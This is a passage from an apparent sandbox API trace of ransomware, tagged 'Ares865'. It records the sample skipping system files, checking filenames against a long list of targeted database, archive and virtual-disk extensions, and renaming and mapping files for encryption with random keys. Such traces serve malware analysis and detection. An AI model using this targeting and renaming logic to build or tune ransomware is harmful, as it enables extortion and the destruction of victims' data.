(lpString1="dll", lpString2="wdb") returned -1 [0088.672] lstrlenW (lpString="wmdb") returned 4 [0088.672] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.672] lstrlenW (lpString="wrk") returned 3 [0088.672] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.672] lstrlenW (lpString="xdb") returned 3 [0088.672] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.672] lstrlenW (lpString="xld") returned 3 [0088.672] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.672] lstrlenW (lpString="xmlff") returned 5 [0088.672] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.672] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.Ares865") returned 81 [0088.672] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.673] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.673] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1276256) returned 1 [0088.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.674] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.674] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.674] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.674] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x137c60, lpName=0x0) returned 0x15c [0088.676] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x137c60) returned 0x3030000 [0088.732] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.733] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.733] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0088.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0088.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.733] UnmapViewOfFile (lpBaseAddress=0x3030000) returned 1 [0088.745] CloseHandle (hObject=0x15c) returned 1 [0088.745] CloseHandle (hObject=0x118) returned 1 [0088.745] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.745] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.745] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.750] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe092000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe092000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3d60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 1 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2=".") returned 1 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="..") returned 1 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="windows") returned 1 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="bootmgr") returned 1 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="temp") returned 1 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="boot") returned 1 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="ids.txt") returned 1 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="perflogs") returned 1 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="MSBuild") returned 1 [0088.751] lstrlenW (lpString="XLSLICER.DLL.trx_dll") returned 20 [0088.751] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll") returned 73 [0088.751] lstrcpyW (in: lpString1=0x2cce468, lpString2="XLSLICER.DLL.trx_dll" | out: lpString1="XLSLICER.DLL.trx_dll") returned="XLSLICER.DLL.trx_dll" [0088.751] lstrlenW (lpString="XLSLICER.DLL.trx_dll") returned 20 [0088.751] lstrlenW (lpString="Ares865") returned 7 [0088.751] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.751] lstrlenW (lpString=".dll") returned 4 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2=".dll") returned 1 [0088.751] lstrlenW (lpString=".lnk") returned 4 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2=".lnk") returned 1 [0088.751] lstrlenW (lpString=".ini") returned 4 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2=".ini") returned 1 [0088.751] lstrlenW (lpString=".sys") returned 4 [0088.751] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2=".sys") returned 1 [0088.751] lstrlenW (lpString="XLSLICER.DLL.trx_dll") returned 20 [0088.751] lstrlenW (lpString="bak") returned 3 [0088.751] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.751] lstrlenW (lpString="ba_") returned 3 [0088.751] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.751] lstrlenW (lpString="dbb") returned 3 [0088.751] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.751] lstrlenW (lpString="vmdk") returned 4 [0088.751] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.752] lstrlenW (lpString="rar") returned 3 [0088.752] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.752] lstrlenW (lpString="zip") returned 3 [0088.752] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.752] lstrlenW (lpString="tgz") returned 3 [0088.752] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.752] lstrlenW (lpString="vbox") returned 4 [0088.752] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.752] lstrlenW (lpString="vdi") returned 3 [0088.752] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.752] lstrlenW (lpString="vhd") returned 3 [0088.752] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.752] lstrlenW (lpString="vhdx") returned 4 [0088.752] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.752] lstrlenW (lpString="avhd") returned 4 [0088.752] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.752] lstrlenW (lpString="db") returned 2 [0088.752] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.752] lstrlenW (lpString="db2") returned 3 [0088.752] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.752] lstrlenW (lpString="db3") returned 3 [0088.752] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.752] lstrlenW (lpString="dbf") returned 3 [0088.752] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.752] lstrlenW (lpString="mdf") returned 3 [0088.752] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.752] lstrlenW (lpString="mdb") returned 3 [0088.752] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.752] lstrlenW (lpString="sql") returned 3 [0088.752] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.752] lstrlenW (lpString="sqlite") returned 6 [0088.752] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.752] lstrlenW (lpString="sqlite3") returned 7 [0088.752] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.752] lstrlenW (lpString="sqlitedb") returned 8 [0088.752] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.752] lstrlenW (lpString="xml") returned 3 [0088.752] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.753] lstrlenW (lpString="$er") returned 3 [0088.753] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.753] lstrlenW (lpString="4dd") returned 3 [0088.753] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.753] lstrlenW (lpString="4dl") returned 3 [0088.753] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.753] lstrlenW (lpString="^^^") returned 3 [0088.753] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.753] lstrlenW (lpString="abs") returned 3 [0088.753] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.753] lstrlenW (lpString="abx") returned 3 [0088.753] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.753] lstrlenW (lpString="accdb") returned 5 [0088.753] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.753] lstrlenW (lpString="accdc") returned 5 [0088.753] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.753] lstrlenW (lpString="accde") returned 5 [0088.753] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.753] lstrlenW (lpString="accdr") returned 5 [0088.753] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.753] lstrlenW (lpString="accdt") returned 5 [0088.753] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.753] lstrlenW (lpString="accdw") returned 5 [0088.753] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.753] lstrlenW (lpString="accft") returned 5 [0088.753] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.753] lstrlenW (lpString="adb") returned 3 [0088.753] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.753] lstrlenW (lpString="adb") returned 3 [0088.753] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.753] lstrlenW (lpString="ade") returned 3 [0088.753] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.753] lstrlenW (lpString="adf") returned 3 [0088.753] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.753] lstrlenW (lpString="adn") returned 3 [0088.753] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.753] lstrlenW (lpString="adp") returned 3 [0088.753] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.754] lstrlenW (lpString="alf") returned 3 [0088.754] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.754] lstrlenW (lpString="ask") returned 3 [0088.754] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.754] lstrlenW (lpString="btr") returned 3 [0088.754] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.754] lstrlenW (lpString="cat") returned 3 [0088.754] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.754] lstrlenW (lpString="cdb") returned 3 [0088.754] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.754] lstrlenW (lpString="ckp") returned 3 [0088.754] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.754] lstrlenW (lpString="cma") returned 3 [0088.754] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.754] lstrlenW (lpString="cpd") returned 3 [0088.754] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.754] lstrlenW (lpString="dacpac") returned 6 [0088.754] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.754] lstrlenW (lpString="dad") returned 3 [0088.754] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.754] lstrlenW (lpString="dadiagrams") returned 10 [0088.754] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0088.754] lstrlenW (lpString="daschema") returned 8 [0088.754] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.754] lstrlenW (lpString="db-journal") returned 10 [0088.754] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0088.754] lstrlenW (lpString="db-shm") returned 6 [0088.754] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.754] lstrlenW (lpString="db-wal") returned 6 [0088.754] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.754] lstrlenW (lpString="dbc") returned 3 [0088.754] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.754] lstrlenW (lpString="dbs") returned 3 [0088.754] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.754] lstrlenW (lpString="dbt") returned 3 [0088.754] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.755] lstrlenW (lpString="dbv") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.755] lstrlenW (lpString="dbx") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.755] lstrlenW (lpString="dcb") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.755] lstrlenW (lpString="dct") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.755] lstrlenW (lpString="dcx") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.755] lstrlenW (lpString="ddl") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.755] lstrlenW (lpString="dlis") returned 4 [0088.755] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.755] lstrlenW (lpString="dp1") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.755] lstrlenW (lpString="dqy") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.755] lstrlenW (lpString="dsk") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.755] lstrlenW (lpString="dsn") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.755] lstrlenW (lpString="dtsx") returned 4 [0088.755] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.755] lstrlenW (lpString="dxl") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.755] lstrlenW (lpString="eco") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.755] lstrlenW (lpString="ecx") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.755] lstrlenW (lpString="edb") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.755] lstrlenW (lpString="epim") returned 4 [0088.755] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.755] lstrlenW (lpString="fcd") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.755] lstrlenW (lpString="fdb") returned 3 [0088.755] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.756] lstrlenW (lpString="fic") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.756] lstrlenW (lpString="flexolibrary") returned 12 [0088.756] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0088.756] lstrlenW (lpString="fm5") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.756] lstrlenW (lpString="fmp") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.756] lstrlenW (lpString="fmp12") returned 5 [0088.756] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.756] lstrlenW (lpString="fmpsl") returned 5 [0088.756] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.756] lstrlenW (lpString="fol") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.756] lstrlenW (lpString="fp3") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.756] lstrlenW (lpString="fp4") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.756] lstrlenW (lpString="fp5") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.756] lstrlenW (lpString="fp7") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.756] lstrlenW (lpString="fpt") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.756] lstrlenW (lpString="frm") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.756] lstrlenW (lpString="gdb") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.756] lstrlenW (lpString="gdb") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.756] lstrlenW (lpString="grdb") returned 4 [0088.756] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.756] lstrlenW (lpString="gwi") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.756] lstrlenW (lpString="hdb") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.756] lstrlenW (lpString="his") returned 3 [0088.756] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.757] lstrlenW (lpString="ib") returned 2 [0088.757] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.757] lstrlenW (lpString="idb") returned 3 [0088.757] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.757] lstrlenW (lpString="ihx") returned 3 [0088.757] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.757] lstrlenW (lpString="itdb") returned 4 [0088.757] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.757] lstrlenW (lpString="itw") returned 3 [0088.757] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.757] lstrlenW (lpString="jet") returned 3 [0088.757] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.757] lstrlenW (lpString="jtx") returned 3 [0088.757] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.757] lstrlenW (lpString="kdb") returned 3 [0088.757] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.757] lstrlenW (lpString="kexi") returned 4 [0088.757] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.757] lstrlenW (lpString="kexic") returned 5 [0088.757] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.757] lstrlenW (lpString="kexis") returned 5 [0088.757] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.757] lstrlenW (lpString="lgc") returned 3 [0088.757] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.757] lstrlenW (lpString="lwx") returned 3 [0088.757] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.757] lstrlenW (lpString="maf") returned 3 [0088.757] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.757] lstrlenW (lpString="maq") returned 3 [0088.757] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.757] lstrlenW (lpString="mar") returned 3 [0088.757] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.757] lstrlenW (lpString="marshal") returned 7 [0088.757] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.757] lstrlenW (lpString="mas") returned 3 [0088.757] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.757] lstrlenW (lpString="mav") returned 3 [0088.757] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.758] lstrlenW (lpString="maw") returned 3 [0088.758] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.758] lstrlenW (lpString="mdbhtml") returned 7 [0088.758] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.758] lstrlenW (lpString="mdn") returned 3 [0088.758] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.758] lstrlenW (lpString="mdt") returned 3 [0088.758] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.758] lstrlenW (lpString="mfd") returned 3 [0088.758] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.758] lstrlenW (lpString="mpd") returned 3 [0088.758] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.758] lstrlenW (lpString="mrg") returned 3 [0088.758] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.758] lstrlenW (lpString="mud") returned 3 [0088.758] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.758] lstrlenW (lpString="mwb") returned 3 [0088.758] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.758] lstrlenW (lpString="myd") returned 3 [0088.758] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.759] lstrlenW (lpString="ndf") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.759] lstrlenW (lpString="nnt") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.759] lstrlenW (lpString="nrmlib") returned 6 [0088.759] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.759] lstrlenW (lpString="ns2") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.759] lstrlenW (lpString="ns3") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.759] lstrlenW (lpString="ns4") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.759] lstrlenW (lpString="nsf") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.759] lstrlenW (lpString="nv") returned 2 [0088.759] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.759] lstrlenW (lpString="nv2") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.759] lstrlenW (lpString="nwdb") returned 4 [0088.759] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.759] lstrlenW (lpString="nyf") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.759] lstrlenW (lpString="odb") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.759] lstrlenW (lpString="odb") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.759] lstrlenW (lpString="oqy") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.759] lstrlenW (lpString="ora") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.759] lstrlenW (lpString="orx") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.759] lstrlenW (lpString="owc") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.759] lstrlenW (lpString="p96") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.759] lstrlenW (lpString="p97") returned 3 [0088.759] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.760] lstrlenW (lpString="pan") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.760] lstrlenW (lpString="pdb") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.760] lstrlenW (lpString="pdm") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.760] lstrlenW (lpString="pnz") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.760] lstrlenW (lpString="qry") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.760] lstrlenW (lpString="qvd") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.760] lstrlenW (lpString="rbf") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.760] lstrlenW (lpString="rctd") returned 4 [0088.760] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.760] lstrlenW (lpString="rod") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.760] lstrlenW (lpString="rodx") returned 4 [0088.760] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.760] lstrlenW (lpString="rpd") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.760] lstrlenW (lpString="rsd") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.760] lstrlenW (lpString="sas7bdat") returned 8 [0088.760] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.760] lstrlenW (lpString="sbf") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.760] lstrlenW (lpString="scx") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.760] lstrlenW (lpString="sdb") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.760] lstrlenW (lpString="sdc") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.760] lstrlenW (lpString="sdf") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.760] lstrlenW (lpString="sis") returned 3 [0088.760] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.761] lstrlenW (lpString="spq") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.761] lstrlenW (lpString="te") returned 2 [0088.761] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 